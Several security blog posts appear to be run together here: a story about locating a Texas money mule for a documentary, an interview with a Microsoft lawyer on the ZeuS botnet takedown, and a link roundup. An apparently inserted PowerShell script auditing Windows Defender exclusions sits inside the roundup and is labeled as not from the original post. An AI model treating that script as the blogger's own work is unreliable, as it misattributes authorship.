    The scheme was hatched by Berkeley writer/director Charles Koppelman, who’d emailed me in mid-2011 about the possibility of catching some money mules on camera for a documentary he’s working on called Zero Day. Koppelman said the money shot would be a mule coming out of a bank with a wad of cash in hand, but that he’d settle for an old-fashioned sit-down interview.

    At the time, I was working with a source who was injected into the communications networks of several money mule recruitment gangs. These miscreants specialize in hiring willing and unwitting “mules” through work-at-home job scams. The mules then are asked to process bank transfers that help organized cyber thieves launder money stolen from small businesses victimized by cybercrime. The networks my source was monitoring indicated the gang was grooming between 75 and 100 mules across the country on any given day, and that they were sending fraudulent transfers to mules almost daily.

    I told Charles that for such a plan to work, we’d need to focus on areas that typically held the highest number of mules per capita, and that meant somewhere in Florida or Texas. When my source indexed the mules and sorted them by hometown, we discovered that there were five mules being groomed for payments within about 200 miles of Austin, Texas. If we rented a car and checked in with my source on a regular basis, we might be able to secure the footage he was after, I suggested.

    But I cautioned Koppelman that I gave our plan about a 20 percent chance of working. I predicted that most of the mules would quit, screw up the transfer task, or be used and discarded by the time we flew down there and actually hit the road. Indeed, when we reached our fleabag motel just south of Austin on Aug. 3, 2011, my prognostication had almost come true entirely: We were down to one last money mule: Geridana, a young, unemployed single mother of two from Webster, a small town of about 9,000 residents in southeastern Texas.

    On the morning of Aug. 4, we piled into the minivan again and raced down to Webster. We didn’t attempt to make contact with her until we were parked outside of her apartment complex, which was next door to a bail bonds shop. Turns out that Geridana was a bit of an oddity: The $9,000+ the thieves had just sent her was actually the fourth such transfer that Geridana had processed in as many weeks. The most pathetic aspect of the whole scheme? She never got paid her promised monthly salary or per-task commissions.

    I’ll stop the story here, because I don’t want to spoil the movie. That is, if it ever attracts enough funding to be finished. The film is co-financed by BBC Storyville, but Koppelman and his son Walker just launched a Kickstarter campaign to raise $20,000 to ensure continued filming of the project. A short introduction to their effort (including a scene starring Yours Truly) is available in the teaser video clip below. The filmmakers are also working with New York Times reporter John Markoff, Reuters reporter Joe Menn, and author Misha Glenny.

    Microsoft Responds to Critics Over Botnet Brouhaha

    April 16th, 2012

    Microsoft’s most recent anti-botnet campaign — a legal sneak attack against dozens of ZeuS botnets — seems to have ruffled the feathers of many in the security community. The chief criticism is that the Microsoft operation exposed sensitive information that a handful of researchers had shared in confidence, and that countless law enforcement investigations may have been delayed or derailed as a result. In this post, I interview a key Microsoft attorney about these allegations.

    Since Microsoft announced Operation B71, I’ve heard from several researchers who said they were furious at the company for publishing data on a group of hackers thought to be behind a majority of the ZeuS botnet activity — specifically those targeting small to mid-sized organizations that are getting robbed via cyber heists. The researchers told me privately that they believed Microsoft had overstepped its bounds with this action, using privileged information without permission from the source(s) of that data (many exclusive industry discussion lists dedicated to tracking cybercriminal activity have strict rules about sourcing and using information shared by other members).

    At the time, nobody I’d heard from with complaints about the action wanted to speak on the record. Then, late last week, Fox IT, a Dutch security firm, published a lengthy blog post blasting Microsoft’s actions as “irresponsible,” and accusing the company of putting its desire for a public relations campaign ahead of its relationship with the security industry.

    “This irresponsible action by Microsoft has led to hampering and even compromising a number of large international investigations in the US, Europe and Asia that we knew of and also helped with,” wrote Michael Sandee, Principal Security Expert at Fox IT. “It has also damaged and will continue to damage international relationships between public parties and also private parties. It also sets back cooperation between public and private parties, so-called public-private partnerships, as sharing will stop or will be definitely less valuable than it used to be for all parties involved.”

    Sandee said that a large part of the information that Microsoft published about the miscreants involved was sourced from individuals and organizations without their consent, breaking various non-disclosure agreements (NDAs) and unspoken rules.

    “In light of the whole Responsible Disclosure debate [link added] from the end of Microsoft this unauthorized and uncoordinated use and publication of information protected under an NDA is obviously troublesome and shows how Microsoft only cares about protecting their own interests,” Sandee wrote.

    Given the strong feelings that Microsoft’s actions have engendered in the Fox IT folks and among the larger security community, I reached out to Richard Boscovich, a former U.S. Justice Department lawyer who was one of the key architects of Microsoft’s legal initiative against ZeuS. One complaint I heard from several researchers who believed that Microsoft used and published data they uncovered was that the company kept the operation from nearly everyone. I asked Boscovich how this operation was different from previous actions against botnets such as Rustock and Waledac.

    Boscovich: It’s essentially the same approach we’ve done in all the other operations. The problem that I think some people have is that due to the type of operation, we can’t have the entire community involved. That’s for several reasons. One is operational security. The bigger the number of people involved, the more likely it is that someone will make a mistake and say something that could jeopardize all of the work that everyone has done. Also, we’re making representations to a federal court that this is an ex-parte motion and very limited people know about it. If you have multiple people knowing, and the entire security community knows, let’s say we submit declarations from 30-40 people. A court may say, ‘Well there’s a lot of people here who know about this, so isn’t this information that’s already publicly available? Don’t these people know you’re looking at them already?’ We’re really asking for an extraordinary remedy: an ex-parte TRO [temporary restraining order] is a very high standard. We have to show an immediate threat and harm, ongoing, so much so that we can’t even give the other side notice that we’re going to sue them and take away their property.

    The other concern is more operational. When I was in the Justice Department — I was there for just shy of 18 years — we even compartmentalized operations there. Information was shared on a need-to-know basis, to make sure the operation would be a success and that there wouldn’t be any inadvertent leaks. It wasn’t because we didn’t trust people, but because people sometimes make mistakes. So in this operation, just like the others, we engaged with industry partners, academic partners, and some of those who wished to be open, and others who preferred to do things behind the scenes.

    Krebs: How do you respond to the criticism that Microsoft used and published data that came from core members of the security community who had placed certain restrictions on the use of that data — specifically that permission be obtained before it is shared or published?

    Boscovich: Whenever we cooperate with the research community and industry partners, the assumption is that the information they provided is either their own, or is freely available amongst them for the purpose of securing the internet. They felt, we believe that all of this information should be used for the purpose for which it was intended: And that is to try to solve the problem and protect people who are being victimized by crime.

    Now, there seems to be some allegations that there was information that one or two people provided to the research community — which is very large, by the way — which for some reason they didn’t want to be acted upon. I don’t know what that means, but we only ask for information from our industry or academic partners that they believe is their own or is being freely shared in the community. The purpose for which we ask for this information is to reduce threat to consumers and people being victimized by crime. If there are any allegations that somehow Microsoft knew this was privileged information, the answer is absolutely not. We respect the rights of others and the information we received from academic or industry partners…the representation was made to us that it was either their own work product, or it was made available by other researchers and that was freely shared amongst them to be used for this type of purpose.

    Krebs: The Fox IT researcher accused Microsoft of disrupting law enforcement investigations into miscreants using ZeuS. Is that true?

    Boscovich: Looking at the Fox-IT blog, I’m disappointed by the fact that they talk about ongoing investigations. There’s no way for us to know whether there’s an ongoing criminal investigation from law enforcement. There’s a litany of legal proscriptions and prohibitions in having that kind of information, so I’m not sure how they would know. But obviously we don’t. They omit the fact that in all of these operations, the objective is to notify and clean the victim’s computers. In addition to disrupting, we want to help clean these computers.

    Krebs: And what about the criticism that Microsoft’s actions actually took down legitimate sites?

    Boscovich: There was some mention that there were legitimate web sites that went down. But you know, the law actually provides a mechanism on that. We put up a cash bond, and we explained to the court that we have a process in place in the event that a legitimate Web site goes down. There were several that were legitimate, but they had been compromised. Our people worked with those sites, and they were not aware they were compromised. And although they were down an hour or two or three, they would probably have never known they were being used by criminal organizations.

    Krebs: Some people have been critical of Microsoft’s actions as “vigilante” activity, as participating in the sort of activity that should be left to the authorities. But Microsoft has taken a slightly different approach, attacking this problem through the civil courts. Is there a conflict here, between these two approaches? Isn’t there the possibility that Microsoft’s actions on the civil side could derail progress of law enforcement investigations working the criminal side?

    Boscovich: Our strategy, which is a disruptive strategy, came from the idea that there are two ways to tackle this problem; you have the very traditional law enforcement approach, which its ultimate goal has always been that you have to have a well-identified target and arrest that person. We’re not saying necessarily that that’s a bad model. For years and years we fought drug dealers by trying to stop the drugs or stop the distribution. Until we said, why don’t we disrupt them differently by going after their flow of money? And you saw this wave of legislation which came about as anti-money laundering. And we began doing money laundering prosecutions, even though that particular case had absolutely no drugs involved at all, but we were able to show some kind of taint.

    Taking that idea, we were able to literally start hitting the criminal enterprises and drug dealers where they really felt it — in their profits. Even though sometimes we didn’t get many arrests, we got seizures, forfeited accounts, forfeited cars, houses. Instead of trying to get the guys behind this, we said why don’t we just strike them where it’s going to hurt them the most? And that is their criminal infrastructure — the botnets — which really allow them to leverage everything they’re doing and make a profit out of it. So we came up with Project Mars and the disruptive strategy.

    Krebs: Is it working?

    Boscovich: I’d say it is working. Recently, an article came out in the Wall Street Journal that mentioned a huge reduction in spam as a result of botnet takedowns. We’ve taken down Waledac, Rustock and Kelihos. All of them basically spam bots. But that disruptive activity has dented the amount of spam that gets sent out. Even today. And I think that’s a good proof point that the disruptive approach works if you give it time and keep going at it.

    What we wanted to do with Zeus was continue with the disruptive approach, but in this case we didn’t target one particular bot. We wanted to make our first assault a much broader assault, and that’s why we went after a particular family of malware, all of them with the same code base, so that we could bring it all together under one legal document, which is under a RICO statute. Kyrus did the malware analysis and found that all these versions bubble back up to the same core code. We wanted to disrupt that business model as much as possible. We knew we were not going to fully eliminate one bot. That was never our intention. And I think we were pretty clear that this was the first salvo to this whole group, to introduce a certain amount of entropy in there, and at that point to try to start increasing the costs of them doing business.

    Krebs: It seems like the core dispute here is what should be done with information that is unearthed by security researchers, that the key question is how or who decides when and whether information about certain bad actors should  be acted upon. Would you say that’s accurate? And where do you come down on that?

    Boscovich: Microsoft is a pretty big company, and a lot of the stuff we do is based on our own research as well. But we really want to see other companies that have appropriate standing do their own actions. We really believe in the disruptive strategies. We believe that all of this information that’s out there…and the community does amazingly good work in tracing this stuff…but there comes a point in time that you have to action on the information. All this information is great, but if you don’t action on it quickly, that data either becomes stale or it moves. We really believe there are people in industry and the academic and security community that want to have an impact and want to work with us.

    Krebs: Were you aware that a number of people Microsoft named in its latest John Doe complaints are considered the core group of folks that the Justice Department has pegged as the guys behind the operations that cost businesses tens of millions of dollars over the last few years?

    Boscovich: Based on the investigation that we uncovered so far, we feel very confident that the people we named, with the exception of a few guys that were lower-level players…we feel confident we’ve named the right individuals involved. I really can’t give you all the information we have, other than what’s outlined in the pleadings. But I think the claim that somehow a civil action will destroy all these criminal investigations…I think that’s a fallacy, and near-sighted, and it shows I think a certain naiveté based on not being in that world and not understanding how criminal investigations operate.

    Krebs: Can you talk about anything you’ve learned since this action, in terms of the actors involved?

    Boscovich: There’s more information that’s coming in, and I feel confident that over the next several weeks and months that will translate into additional updates to the case, and we may amend our complaint. We also are happy to inform that as a result of being able to sinkhole the [ZeuS control] IPs, we can get the location of these infected computers, and work with the community to get this information out. We believe we may be able to get this information out as early as sometime next week.

    Krebs: The Fox IT folks and others in the industry have characterized this initiative as little more than a clever public relations stunt by Microsoft, designed principally to make the company look like it is protecting customers from bad guys. How do you respond to that?

    Boscovich: It’s not a black or white scenario like the Fox-IT people put it. I’ve been doing this for about 17 years, 10 months; I know what very complex criminal investigations [are] and what works well and what works not as well. It’s appropriate and beneficial for both criminal and civil parallel proceedings, because they complement each other.

    From a company perspective, and this goes to the PR allegations, of course every corporation is a for-profit corporation. We’re not a charitable institution, obviously. But there are some times when it makes good business sense to actually do good in the community as well. It’s one of those intersections where business and being a good corporate citizen actually complements each other. I’m not going to be disingenuous and say we don’t have a benefit in doing this. But I can also tell you with a straight face that we do it also because we want to do the right thing, we want to protect our customers, and we want to protect people going on the Internet.

    We’re sort of like the emergency room physicians: When someone comes in and they’re bleeding profusely, you have to stabilize the patient and figure out how to stop the bleeding, so that the next guy who comes — the surgeon — who’s waiting in the operating room, is able to save the life of that person. From a civil perspective, we go in and want to help those victims. We want to stop the bleeding, save as many people as we can and clean their computers.

    The question we have to ask ourselves is when you have information about millions of people who are currently victims of crimes because their systems are compromised, do you do the emergency room thing to try to stop the bleeding and try to clean those peoples’ computers so they continue not to be victimized? Or do you do nothing with the information? I think we’ve been fortunate in working with academic and industry partners to share information and address that problem.

    In terms of identifying the actual cause, getting to the root, the defendants, all this information, we’re going to pass it on as we have in the past to law enforcement. But I think their investigation will be enriched by a lot of things we can do legally simply because we are a victim and we have access and resources to investigate these things. And then when we pass it along, I believe they’re in a much better position to drill down and use the legal processes that they have — which we do not have — to follow things such as money and financial trails and go overseas to international agreements.

    Krebs: With the benefit of hindsight, what — if anything — would you do differently about this operation, if you had to do it all over again?

    Boscovich: That’s a good question. I was a little bit taken aback by some of the criticism in light of the fact that nobody from Fox-IT called us to discuss or explain their concerns, or to why some decisions were made legally. We always want to find ways to work with the community and the sharing of information is crucial to that. If you notice, every time we do one of these we have different academic or industry partners that work with us, and we love to rotate those who do work with us. And the ones who want credit, we really try to make sure they get credit where it’s due. We hopefully will try to explain this better, probably at the next DCC [Digital Crimes Consortium, an annual, invite-only Microsoft conference], that we’re on the same team. I think we want the same objectives, so hopefully we can bridge that gap and continue the work we’re doing, to clean these computers, and to disrupt that ecosystem that is being utilized by the criminals.

    Krebs: In a nutshell, what would you like to get across or communicate better about this action?

    Boscovich: Hopefully, we’ll be able to explain that there are a lot of legal issues involved, and a lot of things we can and cannot do. Some of them many people may not be aware of. Which is understandable: they’re not lawyers. These guys are technical in their field. In the same way I can’t reverse engineer malware, but I’m pretty adept in understanding what are the limitations and potential liability issues when you do these operations. I hopefully can explain that aspect to them, so they have a better understanding and appreciation that when we do things, why we do them the way we do.

    Bits and Pieces: Mini Link Rundown

    April 16th, 2012

    I probably should be pleased to have crammed in three posts this weekend.

    Alas I am not. I’d intended to get one more “biggie” out the door this weekend…aimed for all you sysadmins. I have in mind a “Case of the Unexplained…” type theme on running down some crazy Windows 7 system behavior on a system at the church-house, multi-GB trace file captures, and sundry stuff like chasing a white rabbit down CPU process utilization percentages and disk utilization by process IO type.

    I’m back from that chase with lots of notes, but to do it justice, I’ve got to wait till next week.

    So let’s just enjoy our company at final call over these late-breaking weekend links. Hopefully they will carry us into the week with some inspiration and a few shiny new utility toys to play with at our desks.

    Adobe April 2012 Black Tuesday Update – ISC Diary – In case you missed it, there were a number of critical Adobe patch updates this week.

    APSB12-08 – Security updates available for Adobe Reader and Acrobat – Adobe Security Bulletin – Updates now to 9.5.1 and 10.1.3. This goes for both the PDF “reader” versions as well as the “full” Acrobat PDF generating software application. Patch!

    At the end of last month some Adobe Flash Player updates came out, one feature of which is to now include an “auto-updater” feature for Flash Player (if so selected in the options). That release back on March 29th was 11.2.202.228.

    Guess what snuck out of Adobe Friday (the 13th?). Version 11.2.202.233 of Flash Player.

    • 4/13/2012 – Flash Player Update – Adobe Forums
    • Flash Player 11.2, AIR 3.2 – Adobe Release Notes
    • Adobe – Flash Player – Lists your installed version (check page with each browser you use) and a table of the current version for all platforms.
    • Installation problems | Flash Player | Windows – Adobe. I dropped over to this page, then scrolled just a bit lower to the “Install in a firewall proxy server environment” section to grab all of the direct download installer links there. It’s a one-stop shopping session! Then I spent some time manually updating my portable browser plugins to all the newest versions. Sheesh. Sadly I’m getting very good at it and have now even crafted a custom batch-file to auto-copy/overwrite the new Flash/Reader version DLLs to the plugin directories in my browsers to save me time.

    If in doubt, try running Qualys BrowserCheck page in each of your web-browsers to check your patch-level or use the Secunia Online Software Inspector (OSI). Either of these tools will help tell you if your browsers are securely patched.

    Download just imagex.exe (568k) – TinyApps blog. I LOVE Microsoft’s ImageX.exe imaging tool. It has become second-nature for me to use. If you do a lot of WinPE building and use you probably have already extracted it and keep it handy. However, if not, TinyApps blog shares a quick tip on getting your hands on it from the WAIK without all the drama of installing the WAIK on your system.

    Increase hard disk size in VirtualBox 4.x – TinyApps blog. I know no-one actually creates a virtual hard-drive without first considering (and allocating) all the size they will ever need (and then some) before they first get started. Right? TinyApps bloggist has a great walk-through on how to enlarge your drive size without having to mail off for sketchy blue pills. Lots of supporting linkage at the end as well.

    Value of Targeted Timeline Analysis in Research – Windows Incident Response blog – Keydet89 provides a great post on the work that goes in towards gaining a better understanding of event timelines and Windows behavior. It’s through detailed work like this that our knowledge gets sharper.

    Challenge: What can you do with funky directory names? – ISC Diary post – Mark Baggett warns us to beware those funky file/directory names in Windows! Check out the comments carefully for more feedback. On a related note, the Hexacorn Blog Forensic Riddles posts contain a whole lot more of file-name and directory name tricky shenanigans to be aware of!

    NetworkMiner 1.3 Released – NetRecSec has released v1.3 of the amazing (and still free) NetworkMiner NFAT. This release contains a number of new parsing and extraction features. Go get it now! Of course, if you are lucky enough to be able to purchase a copy of the NetworkMiner Professional version — sadly I’m not ;-( — that too has been updated and you can get your upgraded version for free from their customer portal with login. Happy upgrading, free and pros alike!

    eXtra Buttons: utility buttons in the title of the window – freeware – clever little utility that adds a few extra option buttons to your Windows windows. The default windows options in the top-right corner are minimize, maximize, and close. This app gives you up to thirteen options for managing your window, including roll-up/unroll the window at the caption bar, minimize to System Tray, transparency effects, and minimize to a predefined box area on your desktop. I don’t usually use windows tweaking utilities, but this one could be very useful for you multi-window-multi-taskers.

    Synkron – freeware – Folder synchronization application. Yeah, I hear you. Claus, really? After that super-long roundup of sync/backup apps you recently posted? Just had to add another one? Yep. This one has a pretty intuitive interface and also comes in a Synkron Portable | PortableApps version as well. More details in this older AddictiveTips blog post.

    Colasoft Ping Tool – freeware – Colasoft has a great and super-handy ping tool that supports pinging multiple IP addresses as well as useful charting tools for monitoring and analysis.

    Anti-virus scanning exclusions – ISC Diary post – Daniel Wesemann kickstarts a discussion on setting exclusions in your AV scanning policies. Some vendors have recommendations on file/folder exclusions to improve system performance. On the other hand, the risk of creating “safe-zones” that malware could use as an unscanned landing spot for an APT-style intrusion could outweigh the benefits of following those recommendations. Check out the post and the lively comments that follow. Do you even know if/what your own (or your customers’) policies are regarding AV exclusion settings? Worth looking into.
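    As an added example (not from the ISC Diary post or this blog) of how to actually answer that “do you know what your exclusions are?” question on a Windows box, the PowerShell below lists the local Windows Defender exclusions and flags the ones that carve out a writable, unscanned zone. It assumes the Defender PowerShell module (Get-MpPreference); the “risky” path patterns and extension list are a constructed starting point, not a vendor recommendation.

```powershell
# Added audit example, not code from the ISC Diary post or any vendor.
# Assumes Windows Defender and its PowerShell module (Get-MpPreference).
$prefs = Get-MpPreference

# Constructed heuristics: locations a low-privileged user or a browser can write to,
# so an exclusion here is an unscanned drop zone rather than a performance tweak.
$riskyPathPatterns = @(
    '^[A-Za-z]:\\?$',          # an entire drive
    '\\Users\\',               # profile directories (Downloads, AppData, ...)
    '\\Temp\\?', '\\Tmp\\?',   # temp folders
    '\\ProgramData\\?$',       # the whole ProgramData root
    '\\Public\\', '\\Downloads\\?'
)
# Excluding executable/script types by extension defeats the scanner outright.
$riskyExtensions = @('exe','dll','scr','ps1','vbs','js','bat','cmd','com')

$findings = @()
foreach ($p in @($prefs.ExclusionPath)) {
    if (-not $p) { continue }
    foreach ($pat in $riskyPathPatterns) {
        if ($p -match $pat) {
            $findings += [pscustomobject]@{ Type = 'Path'; Value = $p; Reason = "matches $pat" }
            break
        }
    }
    # Wildcards that swallow whole trees deserve a second look regardless of location.
    if ($p -match '\*') {
        $findings += [pscustomobject]@{ Type = 'Path'; Value = $p; Reason = 'contains wildcard' }
    }
}
foreach ($e in @($prefs.ExclusionExtension)) {
    if ($e -and ($riskyExtensions -contains $e.TrimStart('.').ToLower())) {
        $findings += [pscustomobject]@{ Type = 'Extension'; Value = $e; Reason = 'executable/script type' }
    }
}
foreach ($proc in @($prefs.ExclusionProcess)) {
    # A process exclusion means files opened by that process are not scanned at all.
    if ($proc) {
        $findings += [pscustomobject]@{ Type = 'Process'; Value = $proc; Reason = 'files opened by this process are not scanned' }
    }
}

"Path exclusions:      " + @($prefs.ExclusionPath).Count
"Extension exclusions: " + @($prefs.ExclusionExtension).Count
"Process exclusions:   " + @($prefs.ExclusionProcess).Count
if ($findings) { $findings | Format-Table -AutoSize } else { 'No risky exclusions found.' }
```

    Run it from an elevated prompt on each host (or push it through your management tooling) and compare the output against what the written policy says should be excluded; the gap between the two is the discussion Daniel’s post is asking for.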

    Malware blocks booting – The H Security. News post about a fairly new ransomware attack, discovered by TrendLabs, that hits the MBR. While the vector itself isn’t necessarily anything new (messing around with the MBR), apparently the combination of using it in a ransomware attack is. Trend Micro also has instructions for removing the infection if you encounter this bad-boy.

    And then there was this “bad news getting worse” over the weekend:

    Medicaid hack update: 500,000 records and 280,000 SSNs stolen – ZDNet Zero Day blog. Original post here: Medicaid hacked: over 181,000 records and 25,000 SSNs stolen.

    Expect the fallout from this one to be pretty massive. Quoting from Emil Protalinski’s article linked above:

    DTS had recently moved the claims records to a new server, which had a configuration error at the password authentication level, allowing hackers to circumvent the security system. DTS says it shut down the affected server, implemented new security measures, is reviewing every server in the state to ensure proper security measures are in place, identified where the breakdown occurred, and has implemented new processes to ensure this type of breach will not happen again.

    It was just a year ago we were dealing with a similar mess here in Texas, although in that case it seemed to be more an issue of inside IT data mismanagement than a hacker attack.

    Hoping the week ahead gets better even though it hasn’t started yet.

    Hang tough and remember “Constant Vigilance!”

    –Claus V.

    Categories: Forensic, Security